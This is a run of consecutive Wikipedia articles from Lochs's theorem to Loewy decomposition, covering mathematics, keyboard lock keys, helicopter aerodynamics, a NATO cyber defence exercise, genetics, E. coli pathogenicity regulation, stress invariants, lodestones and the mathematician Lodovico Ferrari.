Proof. Since T n x ≤ 1 {\textstyle T^{n}x\leq 1} , we have 1 n ln T n x → 0 {\textstyle {\frac {1}{n}}\ln T^{n}x\to 0} if and only if lim inf 1 n ln T n x = 0 {\displaystyle \liminf {\frac {1}{n}}\ln T^{n}x=0} Let us consider the set of all x {\textstyle x} that have lim inf 1 n ln T n x < 0 {\textstyle \liminf {\frac {1}{n}}\ln T^{n}x<0} . That is, { x : ∃ c > 0 , ∀ N ≥ 1 , ∃ n ≥ N , T n x < e − c n } {\displaystyle \{x:\exists c>0,\forall N\geq 1,\exists n\geq N,T^{n}x<e^{-cn}\}} = ∪ c > 0 ∩ N ≥ 1 ∪ n ≥ N [ 0 ; N , … , N , a n > e c n , N , … ] {\displaystyle =\cup _{c>0}\cap _{N\geq 1}\cup _{n\geq N}[0;\mathbb {N} ,\dots ,\mathbb {N} ,a_{n}>e^{cn},\mathbb {N} ,\dots ]} where [ 0 ; N , … , N , a n > e c n , N , … ] {\displaystyle [0;\mathbb {N} ,\dots ,\mathbb {N} ,a_{n}>e^{cn},\mathbb {N} ,\dots ]} denotes the set of numbers whose continued fraction expansion has a n > e c n {\displaystyle a_{n}>e^{cn}} , but no other constraints.
Now, since the Gauss map preserves the Gauss measure, [ 0 ; N , … , N , a n > e c n , N , … ] {\displaystyle [0;\mathbb {N} ,\dots ,\mathbb {N} ,a_{n}>e^{cn},\mathbb {N} ,\dots ]} has the same Gauss measure as [ 0 ; a n > e c n , N , … ] {\textstyle [0;a_{n}>e^{cn},\mathbb {N} ,\dots ]} , which is the same as
∫ 0 e − c n ρ ( t ) d t = log 2 ( 1 + e − c n ) ∼ e − c n ln 2 {\displaystyle \int _{0}^{e^{-cn}}\rho (t)dt=\log _{2}(1+e^{-cn})\sim {\frac {e^{-cn}}{\ln 2}}} The union over ∪ n ≥ N {\textstyle \cup _{n\geq N}} sums to ∼ e − c N ( 1 − e − c ) ln 2 {\textstyle \sim {\frac {e^{-cN}}{(1-e^{-c})\ln 2}}} , which at the N → ∞ {\textstyle N\to \infty } limit is zero.
Thus the set of such x {\textstyle x} has Gauss measure zero.
Now, expand the term using basic continued fraction properties: ln | x − p n q n | = ln T n x q n ( q n + q n − 1 T n x ) = − 2 ln q n + ln T n x − ln ( 1 + q n − 1 q n T n x ) {\displaystyle \ln \left|x-{\frac {p_{n}}{q_{n}}}\right|=\ln {\frac {T^{n}x}{q_{n}(q_{n}+q_{n-1}T^{n}x)}}=-2\ln q_{n}+\ln T^{n}x-\ln \left(1+{\frac {q_{n-1}}{q_{n}}}T^{n}x\right)} The second is o ( n ) {\textstyle o(n)} . The third term is ∈ [ ln 1 , ln 2 ] {\textstyle \in [\ln 1,\ln 2]} . Both disappear after dividing by n {\displaystyle n} . Thus lim n 1 n ln | x − p n q n | = − 2 lim n 1 n ln q n = − π 2 6 ln 2 {\displaystyle \lim _{n}{\frac {1}{n}}\ln \left|x-{\frac {p_{n}}{q_{n}}}\right|=-2\lim _{n}{\frac {1}{n}}\ln q_{n}=-{\frac {\pi ^{2}}{6\ln 2}}} where we used the result from Lévy's constant . | https://en.wikipedia.org/wiki/Lochs's_theorem |
LOCK is a function that locks part of a keyboard 's keys into a distinct mode of operation , depending on the lock settings selected. [ 1 ]
Most keyboards have three different types of lock functions: Caps Lock , Num Lock , and Scroll Lock .
Some laptops and compact keyboards also have a Function Lock - FN Lock . On these devices, a Fn modifier key is used to combine keys to save room and add non-standard functionality; a common use is merging the function row ( F1 - F12 ) with keys that adjust settings such as display brightness, media volume and playback, and keyboard illumination. Fn Lock toggles the default output of these keys.
The lock keys are scattered around the keyboard. Most styles of keyboards have three LEDs indicating which locks are enabled, in the upper right corner above the numpad . Some ergonomic keyboards instead place the lock indicators in between the key split. Some brands of keyboards have a function mode key (also called F mode or Office Lock ), and may replace the scroll lock indicator with an office lock indicator. Office Lock, when enabled, will enable alternate functions of the function keys , meant for use with various word processing or email programs.
| https://en.wikipedia.org/wiki/Lock_key |
In helicopter aerodynamics , the Lock number is the ratio of aerodynamic forces, which act to lift the rotor blades , to inertial forces, which act to maintain the blades in the plane of rotation. [ 1 ] It is named after C. N. H. Lock , a British aerodynamicist who studied autogyros in the 1920s. [ 2 ] [ 3 ] : 267
Typical rotorcraft blades have a Lock number between 3 and 12, [ 4 ] usually approximately 8. [ 5 ] The Lock number is typically 8 to 10 for articulated rotors and 5 to 7 for hingeless rotors. [ 3 ] : 186 High-stiffness blades may have a Lock number up to 14. [ 4 ]
Larger blades have a higher mass and more inertia, so tend to have a lower Lock number. Helicopter rotors with more than two blades can have lighter blades, so tend to have a higher Lock number. [ 4 ]
A low Lock number gives good autorotation characteristics due to higher inertia, however this comes with a mass penalty. [ 3 ] : 327
Ray Prouty writes, "The previously discussed numbers: Mach, Reynolds and Froude are used in many fields of fluid dynamic studies. The Lock number is ours alone." [ 2 ]
For a rectangular blade of radius R {\displaystyle R} and chord c {\displaystyle c} , the Lock number γ {\displaystyle \gamma } is calculated as [ 5 ]
γ = ρ C L α c R 4 I b {\displaystyle \gamma ={\frac {\rho C_{L\alpha }cR^{4}}{I_{b}}}}
where: ρ {\displaystyle \rho } is the air density, C L α {\displaystyle C_{L\alpha }} is the lift curve slope of the blade section, and I b {\displaystyle I_{b}} is the moment of inertia of the blade about its flapping hinge.
| https://en.wikipedia.org/wiki/Lock_number |
Locked Shields is an annual cyber defence exercise organised by NATO 's Cooperative Cyber Defence Centre of Excellence in Tallinn since 2010. The format is usually that a red team simulates a hostile attack while blue teams from the participating nations simulate their coordination and defence against this. [ 1 ]
The performance of teams is assessed using a mix of automated and manual scoring. [ 2 ] In 2022, there were 24 teams with an average of 50 experts in each team. [ 3 ] The team from Finland was declared the 2022 winner for the excellence of its situation reporting and solid defence. [ 4 ]
| https://en.wikipedia.org/wiki/Locked_Shields |
In superconductivity , the Lockin effect refers to the preference of vortex phases to be positioned at certain points within cells of a crystal lattice of an organic superconductor .
| https://en.wikipedia.org/wiki/Lockin_effect |
In genetics , a locus ( pl. : loci ) is a specific, fixed position on a chromosome where a particular gene or genetic marker is located. [ 1 ] Each chromosome carries many genes, with each gene occupying a different position or locus; in humans, the total number of protein-coding genes in a complete haploid set of 23 chromosomes is estimated at 19,000–20,000. [ 2 ]
Genes may possess multiple variants known as alleles , and an allele may also be said to reside at a particular locus. Diploid and polyploid cells whose chromosomes have the same allele at a given locus are called homozygous with respect to that locus, while those that have different alleles at a given locus are called heterozygous . [ 3 ] The ordered list of loci known for a particular genome is called a gene map . Gene mapping is the process of determining the specific locus or loci responsible for producing a particular phenotype or biological trait . Association mapping , also known as "linkage disequilibrium mapping", is a method of mapping quantitative trait loci (QTLs) that takes advantage of historic linkage disequilibrium to link phenotypes (observable characteristics) to genotypes (the genetic constitution of organisms), uncovering genetic associations.
The shorter arm of a chromosome is termed the p arm or p-arm , while the longer arm is the q arm or q-arm . The chromosomal locus of a typical gene, for example, might be written 3p22.1 , where 3 denotes the chromosome, p the short arm, 22 region 2, band 2, and .1 sub-band 1. [ citation needed ]
Thus the entire locus of the example above would be read as "three P two two point one". The cytogenetic bands are areas of the chromosome either rich in actively-transcribed DNA ( euchromatin ) or packaged DNA ( heterochromatin ). They appear differently upon staining (for example, euchromatin appears white and heterochromatin appears black on Giemsa staining ). They are counted from the centromere out toward the telomeres . [ citation needed ]
A range of loci is specified in a similar way. For example, the locus of gene OCA1 may be written "11q1.4-q2.1", meaning it is on the long arm of chromosome 11, somewhere in the range from sub-band 4 of region 1 to sub-band 1 of region 2. [ citation needed ]
The ends of a chromosome are labeled "pter" and "qter" , and so "2qter" refers to the terminus of the long arm of chromosome 2. [ citation needed ] | https://en.wikipedia.org/wiki/Locus_(genetics) |
The locus of enterocyte effacement (LEE) is a moderately conserved pathogenicity island consisting of 35,000 base pairs in the bacteria Escherichia coli genome. The LEE encodes the Type III secretion system and associated chaperones and effector proteins responsible for attaching and effacing (AE) lesions in the large intestine . These proteins include intimin , Tir , EspC , EspF , EspH , and Map protein . The LEE has a 39% G+C ratio . [ 1 ] [ clarification needed ]
| https://en.wikipedia.org/wiki/Locus_of_enterocyte_effacement |
The locus of enterocyte effacement-encoded regulator ( Ler ) is a regulatory protein that controls bacterial pathogenicity of enteropathogenic Escherichia coli (EPEC) and enterohemorrhagic Escherichia coli (EHEC) . [ 1 ] More specifically, Ler regulates the locus of enterocyte effacement (LEE) pathogenicity island genes, which are responsible for creating intestinal attachment and effacing lesions and subsequent diarrhea : LEE1, LEE2, and LEE3. [ 1 ] LEE1, 2, and 3 carry the information necessary for a type III secretion system . The transcript encoding the Ler protein is the open reading frame 1 on the LEE1 operon . [ 1 ]
The mechanism of Ler regulation involves competition with histone-like nucleoid structuring protein (H-NS) , a negative regulator of the LEE pathogenicity island. [ 2 ] Ler is regulated by many factors such as plasmid encoded regulator (Per), integration host factor , Fis , BipA, a positive regulatory loop involving GrlA, and quorum sensing mediated by luxS . [ 3 ] [ 4 ]
Ler positively regulates the LEE genes by competition with its homolog, H-NS. [ 5 ] H-NS silences LEE genes via rigid filament structures bound to the DNA that Ler disrupts and replaces through unknown mechanisms. [ 5 ] [ 6 ] Though little is known of the mechanism of Ler regulation, Ler interacts with DNA in specific ways. Ler binds DNA non-cooperatively, bends DNA at low concentrations, stiffens it at high concentrations, and forms toroidal nucleoprotein complexes along DNA in vivo . [ 5 ] [ 7 ]
The regulation of Ler and its transcript, ler , is complex and many-fold. The plasmid encoded regulator (per) directly activates the region of the LEE1 operon which encodes Ler. [ 1 ] Integration host factor is also a direct activator of ler and binds upstream of its promoter. [ 8 ]
Jeannette Barba and her colleagues at the National Autonomous University of Mexico elucidated a positive regulatory loop between Ler, ler , GrlA, and grlRA . GrlA is also a LEE encoded regulator of the LEE pathogenicity island. They found that GrlA activates ler , and that Ler activates grlRA indicating a loop of activation wherein a protein product activates a transcript whose protein product activates the transcript of the original protein. Ler activates grlRA only if H-NS is present, this is not the case for GrlA activation of ler . [ 4 ]
Quorum sensing plays a role in Ler regulation. LuxS is an important protein involved in quorum sensing, particularly in the synthesis of autoinducer molecules. Quorum-sensing E. coli regulator A (QseA) is found in LuxS systems and activates transcription of ler . [ 3 ] Fis, a nucleoid associated protein essential for EPEC's ability to form attaching and effacing lesions, partly acts through activation of Ler expression. [ 9 ] BipA, a ribosomal binding GTPase and prolific regulator of EPEC virulence, transcriptionally regulates Ler from an upstream position where it also regulates other genes. [ 10 ]
The Ler protein also represses its own transcript on the LEE1 operon through DNA looping which prevents RNA polymerase from completing transcription. [ 11 ] [ 12 ] | https://en.wikipedia.org/wiki/Locus_of_enterocyte_effacement-encoded_regulator |
Locus suicide recombination (LSR) constitutes a variant form of class switch recombination that eliminates all immunoglobulin heavy chain constant genes. [ 1 ] It thus terminates immunoglobulin and B-cell receptor (BCR) expression in B-lymphocytes and results in B-cell death since survival of such cells requires BCR expression. This process is initiated by the enzyme activation-induced deaminase upon B-cell activation. LSR is thus one of the pathways that can result into activation-induced cell death in the B-cell lineage. [ 2 ] | https://en.wikipedia.org/wiki/Locus_suicide_recombination |
Lode coordinates ( z , r , θ ) {\displaystyle (z,r,\theta )} or Haigh–Westergaard coordinates ( ξ , ρ , θ ) {\displaystyle (\xi ,\rho ,\theta )} [ 1 ] are a set of tensor invariants that span the space of real , symmetric , second-order, 3-dimensional tensors and are isomorphic with respect to principal stress space . This right-handed orthogonal coordinate system is named in honor of the German scientist Dr. Walter Lode because of his seminal paper written in 1926 describing the effect of the middle principal stress on metal plasticity. [ 2 ] Other examples of sets of tensor invariants are the set of principal stresses ( σ 1 , σ 2 , σ 3 ) {\displaystyle (\sigma _{1},\sigma _{2},\sigma _{3})} or the set of kinematic invariants ( I 1 , J 2 , J 3 ) {\displaystyle (I_{1},J_{2},J_{3})} . The Lode coordinate system can be described as a cylindrical coordinate system within principal stress space with a coincident origin and the z-axis parallel to the vector ( σ 1 , σ 2 , σ 3 ) = ( 1 , 1 , 1 ) {\displaystyle (\sigma _{1},\sigma _{2},\sigma _{3})=(1,1,1)} .
The Lode coordinates are most easily computed using the mechanics invariants . These invariants are a mixture of the invariants of the Cauchy stress tensor , σ {\displaystyle {\boldsymbol {\sigma }}} , and the stress deviator , s {\displaystyle {\boldsymbol {s}}} , and are given by [ 3 ] I 1 = tr ( σ ) , J 2 = ½ s : s , and J 3 = det ( s ) ,
which can be written equivalently in Einstein notation as I 1 = σ k k , J 2 = ½ s i j s j i = ½ s i j s i j , and J 3 = ϵ i j k s 1 i s 2 j s 3 k ,
where ϵ {\displaystyle \epsilon } is the Levi-Civita symbol (or permutation symbol) and the last two forms for J 2 {\displaystyle J_{2}} are equivalent because s {\displaystyle {\boldsymbol {s}}} is symmetric ( s i j = s j i {\displaystyle s_{ij}=s_{ji}} ).
The gradients of these invariants [ 4 ] can be calculated by ∂ I 1 / ∂ σ = I , ∂ J 2 / ∂ σ = s , and ∂ J 3 / ∂ σ = T = s ⋅ s − ( 2 J 2 / 3 ) I ,
where I {\displaystyle {\boldsymbol {I}}} is the second-order identity tensor and T {\displaystyle {\boldsymbol {T}}} is called the Hill tensor.
The z {\displaystyle z} -coordinate is found by calculating the magnitude of the orthogonal projection of the stress state onto the hydrostatic axis: z = σ : E z = I 1 / √3 , where E z = I / √3 is the unit normal in the direction of the hydrostatic axis.
The r {\displaystyle r} -coordinate is found by calculating the magnitude of the stress deviator (the orthogonal projection of the stress state into the deviatoric plane): r = ‖ s ‖ , where s = σ − ( I 1 / 3 ) I is the stress deviator. Writing σ {\displaystyle \sigma } in terms of its isotropic and deviatoric parts and expanding the magnitude of s {\displaystyle {\boldsymbol {s}}} : because E z {\displaystyle {\boldsymbol {E_{z}}}} is isotropic and s {\displaystyle {\boldsymbol {s}}} is deviatoric, their product is zero, which leaves us with r = √( s : s ) . Applying the identity A : B = t r ( A T ⋅ B ) {\displaystyle {\boldsymbol {A}}\colon {\boldsymbol {B}}=\mathrm {tr} \left({\boldsymbol {A}}^{T}\cdot {\boldsymbol {B}}\right)} and using the definition of J 2 = 1 2 t r ( s ⋅ s ) {\displaystyle J_{2}={\frac {1}{2}}\mathrm {tr} \left({\boldsymbol {s}}\cdot {\boldsymbol {s}}\right)} gives r = √( 2 J 2 ) . The tensor E r = s / √( 2 J 2 ) is a unit tensor in the direction of the radial component.
The Lode angle can be considered, rather loosely, a measure of loading type. The Lode angle varies with respect to the middle eigenvalue of the stress. There are many definitions of Lode angle that each utilize different trigonometric functions: the positive sine, [ 5 ] negative sine, [ 6 ] and positive cosine [ 7 ] (here denoted θ s {\displaystyle \theta _{s}} , θ ¯ s {\displaystyle {\bar {\theta }}_{s}} , and θ c {\displaystyle \theta _{c}} , respectively), all defined through the invariant ratio sin ( 3 θ s ) = − sin ( 3 θ ¯ s ) = cos ( 3 θ c ) = ( J 3 / 2 ) ( 3 / J 2 ) 3 / 2 ,
and are related by θ s = − θ ¯ s = π / 6 − θ c .
Because cosine is an even function and the range of the inverse cosine is usually 0 ≤ cos − 1 ( x ) ≤ π {\displaystyle 0\leq \cos ^{-1}(x)\leq \pi } , we take the negative possible value for the θ s {\displaystyle \theta _{s}} term, thus ensuring that θ c {\displaystyle \theta _{c}} is positive.
These definitions are all defined for a range of π / 3 {\displaystyle \pi /3} .
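As a concrete illustration, the coordinates can be computed numerically from a given stress tensor. The sketch below assumes the sine convention for the Lode angle, sin(3θ_s) = (J_3/2)(3/J_2)^(3/2), and a nonzero deviator; the helper name is ours.

    import numpy as np

    def lode_coordinates(stress):
        I1 = np.trace(stress)
        s = stress - (I1 / 3) * np.eye(3)      # stress deviator
        J2 = 0.5 * np.tensordot(s, s)          # (1/2) s_ij s_ij, assumed nonzero
        J3 = np.linalg.det(s)
        z = I1 / np.sqrt(3)                    # hydrostatic coordinate
        r = np.sqrt(2 * J2)                    # deviatoric magnitude
        arg = np.clip(0.5 * J3 * (3 / J2) ** 1.5, -1.0, 1.0)
        return z, r, np.arcsin(arg) / 3        # theta_s in [-pi/6, pi/6]

    # uniaxial tension: z = 1/sqrt(3), r = sqrt(2/3), theta_s = pi/6
    print(lode_coordinates(np.diag([1.0, 0.0, 0.0])))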
The unit normal in the angular direction which completes the orthonormal basis can be calculated for θ s {\displaystyle \theta _{s}} [ 8 ] and θ c {\displaystyle \theta _{c}} [ 9 ] using
The meridional profile is a 2D plot of ( z , r ) {\displaystyle (z,r)} holding θ {\displaystyle \theta } constant and is sometimes plotted using scalar multiples of ( z , r ) {\displaystyle (z,r)} . It is commonly used to demonstrate the pressure dependence of a yield surface or the pressure-shear trajectory of a stress path. Because r {\displaystyle r} is non-negative the plot usually omits the negative portion of the r {\displaystyle r} -axis, but can be included to illustrate effects at opposing Lode angles (usually triaxial extension and triaxial compression).
One of the benefits of plotting the meridional profile with ( z , r ) {\displaystyle (z,r)} is that it is a geometrically accurate depiction of the yield surface. [ 8 ] If a non-isomorphic pair is used for the meridional profile then the normal to the yield surface will not appear normal in the meridional profile. Any pair of coordinates that differ from ( z , r ) {\displaystyle (z,r)} by constant multiples of equal absolute value are also isomorphic with respect to principal stress space. As an example, pressure p = − I 1 / 3 {\displaystyle p=-I1/3} and the Von Mises stress σ v = 3 J 2 {\displaystyle \sigma _{v}={\sqrt {3J_{2}}}} are not an isomorphic coordinate pair and, therefore, distort the yield surface because
and, finally, | − 1 / 3 | ≠ | 3 / 2 | {\displaystyle |-1/{\sqrt {3}}|\neq |{\sqrt {3/2}}|} .
The octahedral profile is a 2D plot of ( r , θ ) {\displaystyle (r,\theta )} holding z {\displaystyle z} constant. Plotting the yield surface in the octahedral plane demonstrates the level of Lode angle dependence. The octahedral plane is sometimes referred to as the 'pi plane' [ 10 ] or 'deviatoric plane'. [ 11 ]
The octahedral profile is not necessarily constant for different values of pressure with the notable exceptions of the von Mises yield criterion and the Tresca yield criterion which are constant for all values of pressure.
The term Haigh-Westergaard space is ambiguously used in the literature to mean both the Cartesian principal stress space [ 12 ] [ 13 ] and the cylindrical Lode coordinate space [ 14 ] [ 15 ] | https://en.wikipedia.org/wiki/Lode_coordinates |
Lodestones are naturally magnetized pieces of the mineral magnetite . [ 1 ] [ 2 ] They are naturally occurring magnets , which can attract iron . The property of magnetism was first discovered in antiquity through lodestones. [ 3 ] Pieces of lodestone, suspended so they could turn, were the first magnetic compasses , [ 3 ] [ 4 ] [ 5 ] [ 6 ] and their importance to early navigation is indicated by the name lodestone , which in Middle English means "course stone" or "leading stone", [ 7 ] from the now-obsolete meaning of lode as "journey, way". [ 8 ]
Lodestone is one of only a very few minerals that is found naturally magnetized. [ 1 ] Magnetite is black or brownish-black, with a metallic luster , a Mohs hardness of 5.5–6.5 and a black streak .
The process by which lodestone is created has long been an open question in geology. Only a small amount of the magnetite on the Earth is found magnetized as lodestone. Ordinary magnetite is attracted to a magnetic field as iron and steel are, but does not tend to become magnetized itself; it has too low a magnetic coercivity , or resistance to magnetization or demagnetization. [ 9 ] Microscopic examination of lodestones has found them to be made of magnetite (Fe 3 O 4 ) with inclusions of maghemite (cubic Fe 2 O 3 ), often with impurity metal ions of titanium , aluminium , and manganese . [ 9 ] [ 10 ] [ 11 ] This inhomogeneous crystalline structure gives this variety of magnetite sufficient coercivity to remain magnetized and thus be a permanent magnet . [ 9 ] [ 10 ] [ 11 ]
The other question is how lodestones get magnetized . The Earth's magnetic field at 0.5 gauss is too weak to magnetize a lodestone by itself. [ 9 ] [ 10 ] The leading theory is that lodestones are magnetized by the strong magnetic fields surrounding lightning bolts. [ 9 ] [ 10 ] [ 11 ] This is supported by the observation that they are mostly found near the surface of the Earth, rather than buried at great depth. [ 10 ]
One of the earliest known references to lodestone's magnetic properties was made by 6th century BC Greek philosopher Thales of Miletus , [ 12 ] whom the ancient Greeks credited with discovering lodestone's attraction to iron and other lodestones. [ 13 ] The name magnet may come from lodestones found in Magnesia , Anatolia . [ 14 ] The ancient Indian medical text Sushruta Samhita describes using magnetic properties of the lodestone to remove arrows embedded in a person's body. [ citation needed ]
The earliest Chinese literary reference to magnetism occurs in the 4th-century BC Book of the Devil Valley Master ( Guiguzi ). [ 15 ] In the chronicle Lüshi Chunqiu , from the 2nd century BC, it is explicitly stated that "the lodestone makes iron come or it attracts it." [ 16 ] [ 17 ] The earliest mention of a needle's attraction appears in a work composed between 20 and 100 AD, the Lunheng ( Balanced Inquiries ): "A lodestone attracts a needle." [ 18 ] In the 2nd century BC, Chinese geomancers were experimenting with the magnetic properties of lodestone to make a "south-pointing spoon" for divination. When it is placed on a smooth bronze plate, the spoon would invariably rotate to a north–south axis. [ 19 ] [ 20 ] [ 21 ] While this has been shown to work, archaeologists have yet to discover an actual spoon made of magnetite in a Han tomb. [ 22 ]
Based on his discovery of an Olmec artifact (a shaped and grooved magnetic bar) in North America, astronomer John Carlson suggests that lodestone may have been used by the Olmec more than a thousand years prior to the Chinese discovery. [ 23 ] Carlson speculates that the Olmecs, for astrological or geomantic purposes, used similar artifacts as a directional device, or to orient their temples, the dwellings of the living, or the interments of the dead. [ 23 ] Detailed analysis of the Olmec artifact revealed that the "bar" was composed of hematite with titanium lamellae of Fe 2–x Ti x O 3 that accounted for the anomalous remanent magnetism of the artifact. [ 24 ]
"A century of research has pushed back the first mention of the magnetic compass in Europe to Alexander Neckam about +1190, followed soon afterwards by Guyot de Provins in +1205 and Jacques de Vitry in +1269. All other European claims have been excluded by detailed study..." [ 25 ]
Lodestones have frequently been displayed as valuable or prestigious objects. The Ashmolean Museum in Oxford contains a lodestone adorned with a gilt coronet that was donated by Mary Cavendish in 1756, possibly to secure her husband's appointment as Chancellor of Oxford University. [ 26 ] Isaac Newton 's signet ring reportedly contained a lodestone which was capable of lifting more than 200 times its own weight. [ 27 ] And in 17th century London, the Royal Society displayed a 6-inch (15 cm) spherical lodestone (a terrella or 'little Earth'), which was used to illustrate the Earth's magnetic fields and the function of mariners' compasses. [ 28 ] One contemporary writer, the satirist Ned Ward , noted how the terrella "made a paper of Steel Filings prick up themselves one upon the back of another, that they stood pointing like the Bristles of a Hedge-Hog ; and gave such Life and Merriment to a Parcel of Needles, that they danc'd [...] as if the devil were in them." [ 29 ] | https://en.wikipedia.org/wiki/Lodestone |
Lodovico de Ferrari (2 February 1522 – 5 October 1565) was an Italian mathematician best known today for solving the biquadratic equation .
Lodovico was born in Bologna; his grandfather, Bartolomeo Ferrari, had been forced out of Milan to Bologna. Lodovico settled in Bologna, and he began his career as the servant of Gerolamo Cardano . He was extremely bright, so Cardano started teaching him mathematics. Ferrari aided Cardano on his solutions for biquadratic equations and cubic equations , and was mainly responsible for the solution of biquadratic equations that Cardano published. While still in his teens, Ferrari was able to obtain a prestigious teaching post in Rome after Cardano resigned from it and recommended him. Ferrari retired young, at 42 years old, and wealthy. [ 1 ] : 300 He then moved back to his home town of Bologna, where he lived with his widowed sister Maddalena and took up a professorship of mathematics at the University of Bologna in 1565. Shortly thereafter he died of white arsenic poisoning, according to legend administered by his sister. [ 2 ] : 18
In 1545 a famous dispute erupted between Ferrari and Cardano's contemporary Niccolò Fontana Tartaglia , involving the solution to cubic equations. Widespread stories that Tartaglia devoted the rest of his life to ruining Ferrari's teacher and erstwhile master Cardano, however, appear to be fabricated. [ 3 ] Mathematical historians now credit both Cardano and Tartaglia with the formula to solve cubic equations, referring to it as the " Cardano–Tartaglia formula ".
| https://en.wikipedia.org/wiki/Lodovico_Ferrari |
In mathematics, Loewner order is the partial order defined by the convex cone of positive semi-definite matrices . This order is usually employed to generalize the definitions of monotone and concave/convex scalar functions to monotone and concave/convex Hermitian valued functions . These functions arise naturally in matrix and operator theory and have applications in many areas of physics and engineering.
Let A and B be two Hermitian matrices of order n . We say that A ≥ B if A − B is positive semi-definite . Similarly, we say that A > B if A − B is positive definite .
Although it is most commonly discussed for matrices (the finite-dimensional case), the Loewner order is also well-defined for operators (the infinite-dimensional case) in the analogous way.
When A and B are real scalars (i.e. n = 1), the Loewner order reduces to the usual ordering of R . Although some familiar properties of the usual order of R remain valid when n ≥ 2, several do not. For instance, two matrices need not be comparable: if A = [ 1 0 0 0 ] {\displaystyle A={\begin{bmatrix}1&0\\0&0\end{bmatrix}}\ } and B = [ 0 0 0 1 ] {\displaystyle B={\begin{bmatrix}0&0\\0&1\end{bmatrix}}\ } then neither A ≥ B nor B ≥ A holds. In other words, the Loewner order is a partial order , but not a total order .
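This incomparability is easy to confirm numerically. Below is a minimal sketch in Python/NumPy (the helper name loewner_geq and the tolerance are choices made here, not part of the source): it tests A ≥ B by checking whether the smallest eigenvalue of the Hermitian difference A − B is nonnegative.

```python
import numpy as np

def loewner_geq(A, B, tol=1e-12):
    """Return True if A >= B in the Loewner order, i.e. A - B is PSD."""
    # eigvalsh assumes a Hermitian argument, which A - B is here.
    return np.linalg.eigvalsh(A - B).min() >= -tol

A = np.array([[1.0, 0.0], [0.0, 0.0]])
B = np.array([[0.0, 0.0], [0.0, 1.0]])

print(loewner_geq(A, B))  # False
print(loewner_geq(B, A))  # False -> A and B are incomparable
```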
Moreover, since A and B are Hermitian matrices, their eigenvalues are all real numbers.
If λ 1 ( B ) is the maximum eigenvalue of B and λ n ( A ) the minimum eigenvalue of A , a sufficient criterion to have A ≥ B is that λ n ( A ) ≥ λ 1 ( B ). If A or B is a multiple of the identity matrix , then this criterion is also necessary.
The Loewner order does not have the least-upper-bound property , and therefore does not form a lattice . Upper bounds do exist: for any finite set S {\displaystyle S} of matrices, one can find a matrix A that is greater than every element of S {\displaystyle S} . However, there will be multiple upper bounds, and no least one among them. In a lattice there would exist a least upper bound sup ( S ) {\displaystyle \sup(S)} such that every upper bound U of S {\displaystyle S} obeys sup ( S ) {\displaystyle \sup(S)} ≤ U . But in the Loewner order, one can have two upper bounds A and B that are both minimal (there is no upper bound C with C ≤ A and C ≠ A ) but incomparable ( A − B is neither positive semidefinite nor negative semidefinite).
In the study of differential equations , the Loewy decomposition breaks every linear ordinary differential equation (ODE) into what are called largest completely reducible components. It was introduced by Alfred Loewy . [ 1 ]
Solving differential equations is one of the most important subfields in mathematics . Of particular interest are solutions in closed form . Breaking ODEs into their largest completely reducible components reduces the process of solving the original equation to solving irreducible equations of lowest possible order. This procedure is algorithmic , so the best possible answer for solving a reducible equation is guaranteed. A detailed discussion may be found in [ 2 ] .
Loewy's results have been extended to linear partial differential equations (PDEs) in two independent variables. In this way, algorithmic methods for solving large classes of linear PDEs have become available.
Let D ≡ d d x {\textstyle D\equiv {\frac {d}{dx}}} denote the derivative with respect to the variable x {\displaystyle x} .
A differential operator of order n {\displaystyle n} is a polynomial of the form L ≡ D n + a 1 D n − 1 + ⋯ + a n − 1 D + a n {\displaystyle L\equiv D^{n}+a_{1}D^{n-1}+\cdots +a_{n-1}D+a_{n}} where the coefficients a i {\displaystyle a_{i}} , i = 1 , … , n {\displaystyle i=1,\ldots ,n} are from some function field, the base field of L {\displaystyle L} . Usually it is the field of rational functions in the variable x {\displaystyle x} , i.e. a i ∈ Q ( x ) {\displaystyle a_{i}\in \mathbb {Q} (x)} . If y {\displaystyle y} is an indeterminate with d y d x ≠ 0 {\textstyle {\frac {dy}{dx}}\neq 0} , L y {\displaystyle Ly} becomes a differential polynomial, and L y = 0 {\displaystyle Ly=0} is the differential equation corresponding to L {\displaystyle L} .
An operator L {\displaystyle L} of order n {\displaystyle n} is called reducible if it may be represented as the product of two operators L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} , both of order lower than n {\displaystyle n} . Then one writes L = L 1 L 2 {\displaystyle L=L_{1}L_{2}} ; juxtaposition denotes the operator product, which is defined by the rule D a i = a i D + a i ′ {\displaystyle Da_{i}=a_{i}D+a_{i}'} . L 1 {\displaystyle L_{1}} is called a left factor of L {\displaystyle L} , and L 2 {\displaystyle L_{2}} a right factor. By default, the coefficient domain of the factors is assumed to be the base field of L {\displaystyle L} , possibly extended by some algebraic numbers , i.e. Q ¯ ( x ) {\displaystyle {\bar {\mathbb {Q} }}(x)} is allowed. If an operator does not allow any right factor it is called irreducible .
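The noncommutative product rule can be made concrete in a few lines of SymPy. The sketch below (the dictionary representation and the name op_mul are choices made here, not part of the source) multiplies two operators by moving each power of D past a coefficient with the Leibniz rule, and confirms the factorization ( D + 1 / x ) ( D − 1 / x ) = D 2 , i.e. D 2 has the right factor D − 1 / x , which annihilates the solution y = x of y'' = 0.

```python
import sympy as sp

x = sp.symbols('x')

def op_mul(L1, L2):
    """Product of differential operators given as {order: coefficient};
    D^i is moved past a coefficient d(x) via D^i d = sum_k C(i,k) d^(k) D^(i-k)."""
    out = {}
    for i, c in L1.items():
        for j, d in L2.items():
            for k in range(i + 1):
                term = c * sp.binomial(i, k) * sp.diff(d, x, k)
                out[i - k + j] = sp.simplify(out.get(i - k + j, 0) + term)
    return out

L1 = {1: sp.Integer(1), 0: 1/x}    # D + 1/x
L2 = {1: sp.Integer(1), 0: -1/x}   # D - 1/x
print(op_mul(L1, L2))              # {2: 1, 1: 0, 0: 0}, i.e. D^2
```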
For any two operators L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} the least common left multiple Lclm ( L 1 , L 2 ) {\displaystyle \operatorname {Lclm} (L_{1},L_{2})} is the operator of lowest order such that both L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} divide it from the right. The greatest common right divisor Gcrd ( L 1 , L 2 ) {\displaystyle \operatorname {Gcrd} (L_{1},L_{2})} is the operator of highest order that divides both L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} from the right. If an operator may be represented as Lclm {\displaystyle \operatorname {Lclm} } of irreducible operators it is called completely reducible . By definition, an irreducible operator is called completely reducible.
